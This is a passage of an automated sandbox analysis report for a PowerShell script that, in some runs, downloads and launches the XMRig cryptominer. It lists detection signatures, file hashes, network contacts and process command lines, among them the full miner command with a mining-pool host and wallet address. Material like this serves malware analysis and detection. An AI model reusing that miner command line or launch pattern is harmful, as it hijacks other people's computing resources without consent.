memory/4408-106-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-107-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-108-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-109-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-110-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-111-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-112-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-113-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-114-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-115-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-116-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-117-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-118-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-119-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-120-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-121-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-122-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-123-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-124-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-125-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-126-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-127-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-128-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-129-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-130-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-131-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-132-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-133-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-134-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-135-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-136-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-137-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-138-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-139-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-140-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-141-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-142-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-143-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-144-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-145-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-146-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-147-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-148-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-149-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-150-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-151-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-152-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-153-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

memory/4408-154-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:37

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/5040-0-0x00007FFFE77F3000-0x00007FFFE77F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_urs2oi5d.dqc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5040-9-0x000002696F350000-0x000002696F372000-memory.dmp

memory/5040-10-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

memory/5040-11-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

memory/5040-12-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

memory/5040-14-0x000002696F3C0000-0x000002696F3D2000-memory.dmp

memory/5040-15-0x000002696F340000-0x000002696F34A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1820-46-0x0000028734E80000-0x0000028734EA0000-memory.dmp

memory/1820-47-0x00000287365F0000-0x0000028736610000-memory.dmp

memory/1820-48-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-50-0x0000028736610000-0x0000028736630000-memory.dmp

memory/1820-51-0x0000028736630000-0x0000028736650000-memory.dmp

memory/5040-49-0x00007FFFE77F0000-0x00007FFFE82B2000-memory.dmp

memory/5040-53-0x00007FFFE77F3000-0x00007FFFE77F5000-memory.dmp

memory/1820-52-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-54-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-55-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-57-0x0000028736630000-0x0000028736650000-memory.dmp

memory/1820-56-0x0000028736610000-0x0000028736630000-memory.dmp

memory/1820-58-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-59-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-60-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-61-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-62-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-63-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-64-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-65-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-66-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-67-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-68-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-69-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-70-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-71-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-72-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-73-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-74-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-75-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-76-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-77-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-78-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-79-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-80-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-81-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-82-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-83-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-84-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-85-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-86-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-87-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-88-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-89-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-90-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-91-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-92-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-93-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-94-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-95-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-96-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-97-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-98-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-99-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-100-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-101-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-102-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-103-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-104-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-105-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-106-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-107-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-108-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-109-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-110-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-111-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-112-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-113-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-114-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-115-0x00007FF732B10000-0x00007FF733743000-memory.dmp

memory/1820-116-0x00007FF732B10000-0x00007FF733743000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:44

Platform

win11-20240508-en

Max time kernel

1651s

Max time network

1660s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/2492-0-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp

memory/2492-9-0x000001B1AA220000-0x000001B1AA242000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zsgnixku.waa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2492-10-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-11-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-12-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-13-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp

memory/2492-14-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:49

Platform

win10v2004-20240226-en

Max time kernel

1794s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4112 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4164 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 216.58.212.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 pki.goog udp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 29.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp

Files

memory/3588-0-0x00007FF984463000-0x00007FF984465000-memory.dmp

memory/3588-1-0x00000172E7E90000-0x00000172E7EB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pko3hmyb.2v0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3588-11-0x00007FF984460000-0x00007FF984F21000-memory.dmp

memory/3588-12-0x00007FF984460000-0x00007FF984F21000-memory.dmp

memory/3588-13-0x00007FF984460000-0x00007FF984F21000-memory.dmp

memory/3588-15-0x00000172E8240000-0x00000172E8252000-memory.dmp

memory/3588-16-0x00000172E8220000-0x00000172E822A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4468-47-0x000001E9C6880000-0x000001E9C68A0000-memory.dmp

memory/3588-48-0x00007FF984463000-0x00007FF984465000-memory.dmp

memory/3588-49-0x00007FF984460000-0x00007FF984F21000-memory.dmp

memory/4468-50-0x000001E9C68D0000-0x000001E9C68F0000-memory.dmp

memory/3588-51-0x00007FF984460000-0x00007FF984F21000-memory.dmp

memory/4468-52-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-53-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-54-0x000001E9C6910000-0x000001E9C6930000-memory.dmp

memory/4468-55-0x000001E9C6930000-0x000001E9C6950000-memory.dmp

memory/4468-56-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-57-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-58-0x000001E9C6910000-0x000001E9C6930000-memory.dmp

memory/4468-59-0x000001E9C6930000-0x000001E9C6950000-memory.dmp

memory/4468-60-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-61-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-62-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-63-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-64-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-65-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-66-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-67-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-68-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-69-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-70-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-71-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-72-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-73-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-74-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-75-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-76-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-77-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-78-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-79-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-80-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-81-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-82-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-83-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-84-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-85-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-86-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-87-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-88-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-89-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-90-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-91-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-92-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-93-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-94-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-95-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-96-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-97-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-98-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-99-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-100-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-101-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-102-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-103-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-104-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-105-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-106-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-107-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-108-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-109-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-110-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-111-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-112-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-113-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

